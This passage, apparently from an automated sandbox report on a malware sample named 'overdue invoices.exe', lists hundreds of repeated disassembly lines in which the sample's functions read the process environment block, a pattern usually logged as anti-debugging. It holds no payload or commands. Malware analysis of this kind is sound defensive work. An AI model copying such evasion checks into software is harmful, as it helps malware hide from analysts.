          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009958EC mov eax, dword ptr fs:[00000030h]1_2_009958EC
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]1_2_00A64015
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]1_2_00A64015
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]1_2_009B0050
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]1_2_009B0050
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]1_2_00A61074
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]1_2_00A52073
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A169A6 mov eax, dword ptr fs:[00000030h]1_2_00A169A6
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2990 mov eax, dword ptr fs:[00000030h]1_2_009C2990
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]1_2_009CA185
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]1_2_009BC182
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]1_2_00A151BE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]1_2_00A151BE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]1_2_00A151BE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]1_2_00A151BE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]1_2_009C61A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]1_2_009C61A0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A241E8 mov eax, dword ptr fs:[00000030h]1_2_00A241E8
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]1_2_0099B1E1
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]1_2_0099B1E1
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]1_2_0099B1E1
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]1_2_00999100
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]1_2_00999100
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]1_2_00999100
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]1_2_009C513A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]1_2_009C513A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]1_2_009BB944
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]1_2_009BB944
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]1_2_0099B171
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]1_2_0099B171
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099C962 mov eax, dword ptr fs:[00000030h]1_2_0099C962
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]1_2_009CD294
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]1_2_009CD294
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]1_2_009AAAB0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]1_2_009AAAB0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]1_2_009CFAB0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2ACB mov eax, dword ptr fs:[00000030h]1_2_009C2ACB
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2AE4 mov eax, dword ptr fs:[00000030h]1_2_009C2AE4
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B3A1C mov eax, dword ptr fs:[00000030h]1_2_009B3A1C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]1_2_00995210
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00995210 mov ecx, dword ptr fs:[00000030h]1_2_00995210
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]1_2_00995210
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]1_2_00995210
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]1_2_0099AA16
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]1_2_0099AA16
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A8A0A mov eax, dword ptr fs:[00000030h]1_2_009A8A0A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]1_2_009D4A2C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]1_2_009D4A2C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]1_2_00A4B260
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]1_2_00A4B260
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]1_2_00A68A62
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]1_2_009D927A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A24257 mov eax, dword ptr fs:[00000030h]1_2_00A24257
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]1_2_00A65BA5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2397 mov eax, dword ptr fs:[00000030h]1_2_009C2397
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CB390 mov eax, dword ptr fs:[00000030h]1_2_009CB390
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]1_2_009A1B8F
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]1_2_009A1B8F
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]1_2_00A4D380
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]1_2_00A5138A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]1_2_009C4BAD
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]1_2_009C4BAD
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]1_2_009C4BAD
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]1_2_00A153CA
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]1_2_00A153CA
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009BDBE9 mov eax, dword ptr fs:[00000030h]1_2_009BDBE9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]1_2_009C03E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]1_2_009C03E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]1_2_009C03E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]1_2_009C03E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]1_2_009C03E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]1_2_009C03E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]1_2_00A5131B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]1_2_0099F358
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]1_2_0099DB40
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]1_2_009C3B7A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]1_2_009C3B7A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]1_2_0099DB60
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]1_2_00A68B58
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A849B mov eax, dword ptr fs:[00000030h]1_2_009A849B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]1_2_00A16CF0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]1_2_00A16CF0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]1_2_00A16CF0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]1_2_00A514FB
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]1_2_00A68CD6
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]1_2_00A51C06
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]1_2_00A6740D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]1_2_00A6740D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]1_2_00A6740D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]1_2_00A16C0A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]1_2_00A16C0A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]1_2_00A16C0A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]1_2_00A16C0A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]1_2_009CBC2C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CA44B mov eax, dword ptr fs:[00000030h]1_2_009CA44B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]1_2_00A2C450
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]1_2_00A2C450
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]1_2_009B746D
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]1_2_009CFD9B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]1_2_009CFD9B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]1_2_00A605AC
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]1_2_00A605AC
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]1_2_00992D8A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]1_2_00992D8A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]1_2_00992D8A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]1_2_00992D8A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]1_2_00992D8A
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]1_2_009C2581
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]1_2_009C2581
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]1_2_009C2581
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]1_2_009C2581
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]1_2_009C1DB5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]1_2_009C1DB5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]1_2_009C1DB5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]1_2_009C35A1
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]1_2_00A48DF1
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]1_2_00A16DC9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]1_2_00A16DC9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]1_2_00A16DC9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A16DC9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]1_2_00A16DC9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]1_2_00A16DC9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]1_2_009AD5E0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]1_2_009AD5E0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]1_2_00A68D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A1A537 mov eax, dword ptr fs:[00000030h]1_2_00A1A537
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]1_2_009C4D3B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]1_2_009C4D3B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]1_2_009C4D3B
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]1_2_0099AD30
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]1_2_009A3D34
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]1_2_009B7D50
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]1_2_009D3D43
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]1_2_00A13540
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]1_2_009BC577
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]1_2_009BC577
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]1_2_00A60EA5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]1_2_00A60EA5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]1_2_00A60EA5
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]1_2_00A146A7
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]1_2_00A2FE87
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]1_2_009C36CC
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D8EC7 mov eax, dword ptr fs:[00000030h]1_2_009D8EC7
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A4FEC0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]1_2_00A68ED6
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]1_2_009A76E2
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]1_2_009C16E0
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]1_2_009CA61C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]1_2_009CA61C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]1_2_0099C600
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]1_2_0099C600
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]1_2_0099C600
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]1_2_00A4FE3F
